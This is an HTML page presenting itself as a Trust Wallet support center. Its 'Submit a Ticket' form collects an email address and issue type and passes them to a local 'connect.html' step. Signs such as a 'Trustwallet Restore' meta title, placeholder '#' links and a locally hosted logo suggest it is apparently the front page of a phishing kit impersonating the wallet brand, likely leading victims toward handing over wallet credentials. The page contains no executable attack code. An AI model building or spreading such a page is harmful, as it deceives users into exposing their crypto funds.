<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <meta property="og:title" content="Trustwallet | The most trusted and secured crypto wallet" />
    <title> Trust Wallet : Support </title>
     <meta property="og:title" content="TrustWallet | Buy Bitcoin, Ethereum, BNB and other cryptocurrencies on a platform trusted by millions" />
<meta property="og:type" content="website" />
<meta property="og:image:url" content="download.png" />
<meta property="og:url" content="#" />
  <meta name="theme-color" content="#6693d6"/>
    <link rel="shortcut icon" href="download.png" type="image/x-icon">
    <meta name="twitter:description"
    content="Buy Bitcoin, Ethereum, BNB and other cryptocurrencies on a platform trusted by millions." />
    <meta name="twitter:title" content="Trustwallet Restore" />
    <link rel="shortcut icon" href="download.png" type="image/x-icon">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
  <link rel="stylesheet" href="style.css" />
</head>
<body>

  <!-- Header Logo -->
  <header class="py-4 text-center">
<header class="py-4 text-center">
  <div class="d-flex justify-content-center align-items-center gap-2">
    <img src="download.png" alt="Logo" height="60">
    <span class="h5 mb-0 fw-semibold">Trust Wallet</span>
  </div>
</header>

  </header>

  <!-- Main Form -->
  <main class="container my-5" style="max-width: 500px;">
    <h2 class="text-center mb-4">Submit a Ticket</h2>
    <form action="connect.html" method="GET">
      <div class="mb-3">
        <label for="email" class="form-label">Email Address</label>
        <input type="email" id="email" name="email" class="form-control" required />
      </div>

      <div class="mb-3">
        <label for="env" class="form-label">Environment</label>
        <select id="env" name="env" class="form-select" required>
          <option value="">Select</option>
          <option value="desktop">Desktop</option>
          <option value="mobile">Mobile App</option>
          <option value="extension">Extension</option>
          <option value="N/A">N/A</option>
        </select>
      </div>

      <div class="mb-4">
        <label for="issue" class="form-label">Issue Type</label>
        <select id="issue" name="issue" class="form-select" required>
          <option value="">Select</option>
          <option value="transaction">Transaction Issues</option>
          <option value="wallet">Wallet Not Opening</option>
          <option value="Wrong Network">Wrong Network</option>
          <option value="Wrong Address">Wrong Address</option>
                    <option value="cancel Transaction">Cancel Transaction</option>
                    <option value="Network Fees">Network Fees</option>
                    <option value="Dust UTXO Error">Dust UTXO Error</option>
                    <option value="Forgot Memo or Destination Tag">Forgot Memo or Destination Tag</option>
                              <option value="Sent to Smart Contract">Sent to Smart Contract</option>
                              <option value="Transaction History">Transaction History</option>
                              <option value="Pending/Stuck Transaction">Pending/Stuck Transaction</option>
                              <option value="Unable to Receive">Unable to Receive</option>




          <option value="security">Security Concerns</option>
          <option value="missing">Missing Assets</option>
        </select>
      </div>

      <div class="d-grid">
        <button type="submit" class="btn btn-primary">Continue</button>
      </div>
    </form>
  </main>

  <!-- Footer -->
  <footer class="bg-light py-5 mt-5">
    <div class="container">
      <div class="row">
        <!-- Logo -->
    <div class="col-md-4 text-center text-md-start mb-3">
  <div class="d-flex align-items-center gap-2">
    <img src="download.png" alt="Logo" height="40">
    <span class="fw-semibold">Trust Wallet</span>
  </div>
</div>


        <!-- Column 2 -->
        <div class="col-md-4 text-center mb-3">
          <strong>Help Center</strong><br/>
          Brought to you by Trust Wallet
        </div>

        <!-- Column 3 -->
        <div class="col-md-4 text-center text-md-end">
          <div><a href="#">Information</a></div>
          <div><a href="#">Community</a></div>
          <div><a href="#">FAQ</a></div>
          <div><a href="#">Assets</a></div>
          <div><a href="#">Terms of Service</a></div>
          <div><a href="#">Privacy Policy</a></div>
          <div><a href="#">Submit DApp</a></div>
        </div>
      </div>
    </div>
  </footer>

</body>
</html>
